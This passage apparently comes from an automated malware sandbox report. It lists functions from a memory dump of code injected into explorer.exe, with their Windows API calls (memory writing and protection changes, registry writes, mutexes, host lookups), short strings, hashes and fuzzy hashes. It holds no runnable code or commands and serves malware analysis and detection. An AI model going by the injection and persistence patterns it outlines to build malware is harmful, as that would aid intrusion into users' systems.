                                                                                                                                                      • Instruction Fuzzy Hash: 9D1188707046044FE754DF68D49832A76D1FB8C325F298A2DF85AC37D0DB789941C742
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetWaitableTimer.KERNEL32 ref: 04DA9559
                                                                                                                                                        • Part of subcall function 04DC1E58: RegSetValueExA.KERNEL32 ref: 04DC1EB5
                                                                                                                                                        • Part of subcall function 04DC1E58: RegCloseKey.KERNEL32 ref: 04DC1ECA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseTimerValueWaitable
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1352355977-0
                                                                                                                                                      • Opcode ID: e3aa066d265a63dea7bf9722da53871929a24fc67bcf5ed35ac10724dab03a71
                                                                                                                                                      • Instruction ID: a05684025133ad83f523bf1ce33026ffa7249a7f1806a7ae58e270bfdcb17b4e
                                                                                                                                                      • Opcode Fuzzy Hash: e3aa066d265a63dea7bf9722da53871929a24fc67bcf5ed35ac10724dab03a71
                                                                                                                                                      • Instruction Fuzzy Hash: C201B131218B088FDB45EB28D48876EBBE0FBD9311F100A5EE58AC3160DF75D4418B82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DB3830: NtWriteVirtualMemory.NTDLL ref: 04DB384F
                                                                                                                                                      • VirtualProtectEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04DAFBE4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Virtual$MemoryProtectWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1789425917-0
                                                                                                                                                      • Opcode ID: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
                                                                                                                                                      • Instruction ID: 4b3cdc6c951fddbb9eb487e2302702023610dc38c044822d63d756e879b43cb1
                                                                                                                                                      • Opcode Fuzzy Hash: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
                                                                                                                                                      • Instruction Fuzzy Hash: FD017C70618B088FCB48EF58A0C452AB7E0FB9C310B4005AEE84EC7356CB70DD45CB86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateMutex
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1964310414-0
                                                                                                                                                      • Opcode ID: 12b9b79c15c5aab77b152edb17cccdcc073a16d7b29624bf842b1d686773addd
                                                                                                                                                      • Instruction ID: 381709761c738c7f3a3e69d4123f92a57599ca70d35db1c3fb2f1abd3aa3fa9a
                                                                                                                                                      • Opcode Fuzzy Hash: 12b9b79c15c5aab77b152edb17cccdcc073a16d7b29624bf842b1d686773addd
                                                                                                                                                      • Instruction Fuzzy Hash: 66F03030358E098FB788EB6DAC9C66536D2E7AC601B048039B44AC3264EE64D8418782
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitThreadUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3424019298-0
                                                                                                                                                      • Opcode ID: 69fdc09703159843f7cd7d2f30b1b3dcc8a53e7e4aad6a8f0448b74fd27edef4
                                                                                                                                                      • Instruction ID: 1ab67154cb61a45052a533997bb72bec4011411fcac7495472a867ed738cf941
                                                                                                                                                      • Opcode Fuzzy Hash: 69fdc09703159843f7cd7d2f30b1b3dcc8a53e7e4aad6a8f0448b74fd27edef4
                                                                                                                                                      • Instruction Fuzzy Hash: 2BF01230254A058BEB59DF38DCD466677A2EB85311B14865CE416C61D4DF74D842CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitThreadUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3424019298-0
                                                                                                                                                      • Opcode ID: 8f30c42a237391e3bd4efc725238890a726ebde1fc6d63616ab5e1f0a126eae9
                                                                                                                                                      • Instruction ID: b80ab827e8f35d98c8e3e8bd376f4b88e185f056204786a6a395f60c02eec2c4
                                                                                                                                                      • Opcode Fuzzy Hash: 8f30c42a237391e3bd4efc725238890a726ebde1fc6d63616ab5e1f0a126eae9
                                                                                                                                                      • Instruction Fuzzy Hash: 1BB09B3450170C97D53C77F85C5D1453755E784135B00CF545171468D0DE7D56514757
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                                                                                                                                      • API String ID: 0-647159250
                                                                                                                                                      • Opcode ID: f92ce9f8b422821a734d10ebff8381a99305391ad42a77ecb7337dd8f9eaa649
                                                                                                                                                      • Instruction ID: 26869e95ad27890fab56a6e2c8c99596a4b98f1206c17ce96370d1e2aababcc2
                                                                                                                                                      • Opcode Fuzzy Hash: f92ce9f8b422821a734d10ebff8381a99305391ad42a77ecb7337dd8f9eaa649
                                                                                                                                                      • Instruction Fuzzy Hash: 21129430618B098FDB69EF28D8996E673E1FB95301F54452AD8CBC3655DF34F8428B82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: :9s$}UKt
                                                                                                                                                      • API String ID: 0-2423254669
                                                                                                                                                      • Opcode ID: 9dfd0a7150b396390c702348001b287cdc48f5c70b2da00c9676731c0eb395bc
                                                                                                                                                      • Instruction ID: 526a8051ca03ba64aeb698c8c34ef3156587070bc6b429f62595d3a711ad81c2
                                                                                                                                                      • Opcode Fuzzy Hash: 9dfd0a7150b396390c702348001b287cdc48f5c70b2da00c9676731c0eb395bc
                                                                                                                                                      • Instruction Fuzzy Hash: 5422F8317287459BDB2C9F28A8F927972D2FB94304F18453ED48BC7690EE38F4658742
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: K$P
                                                                                                                                                      • API String ID: 0-420285281
                                                                                                                                                      • Opcode ID: 0c69b491a1760776bd87aaff28f67e02088900d39399d5c6fe952f532f782f14
                                                                                                                                                      • Instruction ID: af9de5cc0f28235781e1382dac559897eedfd338271a1f2114fe874f494a3a14
                                                                                                                                                      • Opcode Fuzzy Hash: 0c69b491a1760776bd87aaff28f67e02088900d39399d5c6fe952f532f782f14
                                                                                                                                                      • Instruction Fuzzy Hash: 8341703010CB88CFCB5ADE5C888465BBBE0FBA9304F540A9DE4CAC7242D774DA55C7A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: W
                                                                                                                                                      • API String ID: 0-655174618
                                                                                                                                                      • Opcode ID: 0911aeda453c00f3beff6356c4c5d3e787abdfebae3c0cfd7666e2a7026e44ac
                                                                                                                                                      • Instruction ID: a1b8b50753c18cb73698d1e9a320c93a858b72e4d14d3bae0bc5a82148afc844
                                                                                                                                                      • Opcode Fuzzy Hash: 0911aeda453c00f3beff6356c4c5d3e787abdfebae3c0cfd7666e2a7026e44ac
                                                                                                                                                      • Instruction Fuzzy Hash: 0E42D171318A488FDB68EF68DCD95A973E2F799300F14456ED98BC3250EE34E90687C2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: vids
                                                                                                                                                      • API String ID: 0-3767230166
                                                                                                                                                      • Opcode ID: 6d10290c3cc2fe7ebb11d1d4ac6b8d0cf8604d31bbb35474c2630ee1a5c41697
                                                                                                                                                      • Instruction ID: c6b7fea857fe983b04ea4ca9a2709b38dc52dbc7ad7294cf011a948677f9308b
                                                                                                                                                      • Opcode Fuzzy Hash: 6d10290c3cc2fe7ebb11d1d4ac6b8d0cf8604d31bbb35474c2630ee1a5c41697
                                                                                                                                                      • Instruction Fuzzy Hash: 89C149716187448FE728EF68C455BAAB7E1FBD5315F14492EE4CAC3250EB34E816CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: P
                                                                                                                                                      • API String ID: 0-3110715001
                                                                                                                                                      • Opcode ID: 8259038c905ca743461412156db47d71196d6797425a6d704451adbb7f6b3f95
                                                                                                                                                      • Instruction ID: 0925a0dcdb7ed8f23175dcbd60e7159d03148abc9b5d73847ede4960db8eef75
                                                                                                                                                      • Opcode Fuzzy Hash: 8259038c905ca743461412156db47d71196d6797425a6d704451adbb7f6b3f95
                                                                                                                                                      • Instruction Fuzzy Hash: B8A1E530308A098FEB64FF28D88976973E5FB98301F14452DE88AC3250DF38E946CB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 929d1a17d79467dad19b0335158462087982ef3d82f51982b2739965ec0533ad
                                                                                                                                                      • Instruction ID: 272f07987ef3607f65ce5aa1b682e4cd9859e0c46eb66d12740a93ece9b8df2c
                                                                                                                                                      • Opcode Fuzzy Hash: 929d1a17d79467dad19b0335158462087982ef3d82f51982b2739965ec0533ad
                                                                                                                                                      • Instruction Fuzzy Hash: 76426B767B82804B974CC918DCA36F932DAE7C631E71CA43DE9C7C6247EA29D5078948
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ce53e8885eef6f405a18b534ce9aa84660a43129bf14b24cd1073f7758dbc652
                                                                                                                                                      • Instruction ID: a64948556948a8634f0c7618ab9fb3448d979137ae11a7b98afc72026e5f2838
                                                                                                                                                      • Opcode Fuzzy Hash: ce53e8885eef6f405a18b534ce9aa84660a43129bf14b24cd1073f7758dbc652
                                                                                                                                                      • Instruction Fuzzy Hash: 30721D34718B448FDB79EF29C894A6AB7E2FBD8305F14896ED58AC3254DB30E451CB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a443d61341c18cd97b790f006cf3d1912a007581d04bdff0d780d85c9a98818a
                                                                                                                                                      • Instruction ID: e2a11657d819be315564a2e256d15ec5b849a51104c835058dfebb14202e7b9c
                                                                                                                                                      • Opcode Fuzzy Hash: a443d61341c18cd97b790f006cf3d1912a007581d04bdff0d780d85c9a98818a
                                                                                                                                                      • Instruction Fuzzy Hash: 5052E2305246458FCB6DDF18C4C5AB077E1FB49316B2412BDEC8ACB25BEA39E486CB45
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: baf05252a05ea58bc97de27108a202a4aef29202f1b45d0635475cb66fd9e309
                                                                                                                                                      • Instruction ID: c9458f43cdb246698d5853dca5c6b46c980a7b53e29d66f62cbcf4ebe45ae188
                                                                                                                                                      • Opcode Fuzzy Hash: baf05252a05ea58bc97de27108a202a4aef29202f1b45d0635475cb66fd9e309
                                                                                                                                                      • Instruction Fuzzy Hash: 5A12D170618B999FC31DDF2884856E5B7E4FB45308F14066ED8D783A02E72AF466CBC6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 2798525bac0ede09e869c64245c6507276901d2ac0d7b0b2c734b716b625cc8e
                                                                                                                                                      • Instruction ID: b5baf07412190c865e7dc7f9604eea324974e8bccabb0be3fb0b4ea14412f951
                                                                                                                                                      • Opcode Fuzzy Hash: 2798525bac0ede09e869c64245c6507276901d2ac0d7b0b2c734b716b625cc8e
                                                                                                                                                      • Instruction Fuzzy Hash: 0B1220B0615F9BAFC70DDF28C4856A4B7A1FB59319B10462DC46AC3A41E735F466CBC0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 330a9aa12c6ff8a79775d49d2767f2384196221c541152650cbf6622a85dfc99
                                                                                                                                                      • Instruction ID: 9d16d85059858841a6fefd7b0e8abec060b05de45e9fe2f4234050b6e94e5a71
                                                                                                                                                      • Opcode Fuzzy Hash: 330a9aa12c6ff8a79775d49d2767f2384196221c541152650cbf6622a85dfc99
                                                                                                                                                      • Instruction Fuzzy Hash: 33F13770614A098BE72DAF2CD8842B573E3FB85319F18423ED587C3595EA34E467C682
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3ff7cdd9ab4db3fccd5fc41fa4c9d3ca355271f65650ec7d004171c1611c6aa9
                                                                                                                                                      • Instruction ID: cb08f17b67915dd370e91ff39ad7fe7a2a8519d6b1f25c651af741d148bdfcc6
                                                                                                                                                      • Opcode Fuzzy Hash: 3ff7cdd9ab4db3fccd5fc41fa4c9d3ca355271f65650ec7d004171c1611c6aa9
                                                                                                                                                      • Instruction Fuzzy Hash: 06F19770618A488FC778EF2998857AA73D5FB98310F50466DE4CFC3255EE30E84697C6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3672760b6b3f398ae9d795d7dcafc8815f8a6bf6e33c05536d5303da6c717689
                                                                                                                                                      • Instruction ID: 152f60c2a0e30ac9ba6afe41342de97e882bb6146f27aee283e6ddd14aab2089
                                                                                                                                                      • Opcode Fuzzy Hash: 3672760b6b3f398ae9d795d7dcafc8815f8a6bf6e33c05536d5303da6c717689
                                                                                                                                                      • Instruction Fuzzy Hash: 9EE1F531618A864BD71D8F3CD9962B47BD2FB95314B28426DE8DBC33C7E529E4078781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d6df0730ef4bf58d31d675e2aba10241cc7989b9c41ca9196fc39608153e366e
                                                                                                                                                      • Instruction ID: 384d5200704cbb1f398dab594e2cea72f770dceef7c6c1112d1aada4d7949535
                                                                                                                                                      • Opcode Fuzzy Hash: d6df0730ef4bf58d31d675e2aba10241cc7989b9c41ca9196fc39608153e366e
                                                                                                                                                      • Instruction Fuzzy Hash: DED1F334258A098FE71D8E28D8C26F577D3FB46305F54426CD9CBC7252EA25E493CAC6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: cf875b605b40a34af0326c56a6fca20d7c3f307a1796be211662965362916f8b
                                                                                                                                                      • Instruction ID: 338323bf829056cff1c52e99f3cc2fdc82dacae3bc3b6b515386a522e818075d
                                                                                                                                                      • Opcode Fuzzy Hash: cf875b605b40a34af0326c56a6fca20d7c3f307a1796be211662965362916f8b
                                                                                                                                                      • Instruction Fuzzy Hash: E4D1D630718B198FDB18EF29D8C5669B7E5FB98700F50452ED58AC3261EE34E946CBC2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: gethostbyname
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 930432418-0
                                                                                                                                                      • Opcode ID: 38ef7869ea58fb94598961df75031656996b7b80e58d3b09030ad0ec587d72ab
                                                                                                                                                      • Instruction ID: 138fe902577deecd8455877ea6c3d2e2b02daeafcc57391cf41eb3c19a541187
                                                                                                                                                      • Opcode Fuzzy Hash: 38ef7869ea58fb94598961df75031656996b7b80e58d3b09030ad0ec587d72ab
                                                                                                                                                      • Instruction Fuzzy Hash: 04E15530B14B068FFB58EB79DCA4AA673D6FBDC315B44807D984AC3254DE38E9418B61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$First$CloseNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2001080981-0
                                                                                                                                                      • Opcode ID: 6856baa2744d5c5f37773981dc3747ff70e285344847ae6b40f5a8a125173493
                                                                                                                                                      • Instruction ID: 913c3ad6fd77d83c1bb25727440020e84c0bd4c3cd19633215fe55cb06aeaa79
                                                                                                                                                      • Opcode Fuzzy Hash: 6856baa2744d5c5f37773981dc3747ff70e285344847ae6b40f5a8a125173493
                                                                                                                                                      • Instruction Fuzzy Hash: A4D1A63161CA088FEB5AFF29EC9996A73E5F798300700462ED44BD3265DF78E945CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 948161d6fa15a810aa6e5b6e230907f9d72ef5ce46a0806776a272e79ee9e756
                                                                                                                                                      • Instruction ID: 1edc3af4378462debcd5ed438d85e540e0085dcdbc419a3c17be2155b658bb85
                                                                                                                                                      • Opcode Fuzzy Hash: 948161d6fa15a810aa6e5b6e230907f9d72ef5ce46a0806776a272e79ee9e756
                                                                                                                                                      • Instruction Fuzzy Hash: 49E1403060CB48CFDB69EF14D8896EAB7E1FB99341F54852ED58AC3220DB74E545CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0cc8c4c9f205f58748cb3b44b050f6e6f9e6345d57d988be40e27c4f8ce905cb
                                                                                                                                                      • Instruction ID: 51362d2b2118c11f08f3429a892f7d00d3218271e734d665174add9b9d29a625
                                                                                                                                                      • Opcode Fuzzy Hash: 0cc8c4c9f205f58748cb3b44b050f6e6f9e6345d57d988be40e27c4f8ce905cb
                                                                                                                                                      • Instruction Fuzzy Hash: 91C19170218A068FEB58DF38D4997AAB7E5FF88705F50456DD48BC3690DB34E852CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
                                                                                                                                                      • Instruction ID: 98d7a458847d8065703c459c24f0a37a7c0559c2fd4c646f4dccc9af9680de55
                                                                                                                                                      • Opcode Fuzzy Hash: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
                                                                                                                                                      • Instruction Fuzzy Hash: 2C917570618B098FE758EF28E8997A673E5FB94311F00852ED58BC3251EF78E8468781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 40becd915303a3bf600ab9d0924b14316bcba838081402962a61d943fc700c8c
                                                                                                                                                      • Instruction ID: d2a11981d33d8710e607522d96c766091798f6d54a607f6da67081ea07f378ca
                                                                                                                                                      • Opcode Fuzzy Hash: 40becd915303a3bf600ab9d0924b14316bcba838081402962a61d943fc700c8c
                                                                                                                                                      • Instruction Fuzzy Hash: B081097121CB098FEB54EF28DC996A977E1F799310F00496EE44AC32A1EF34E94587C6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
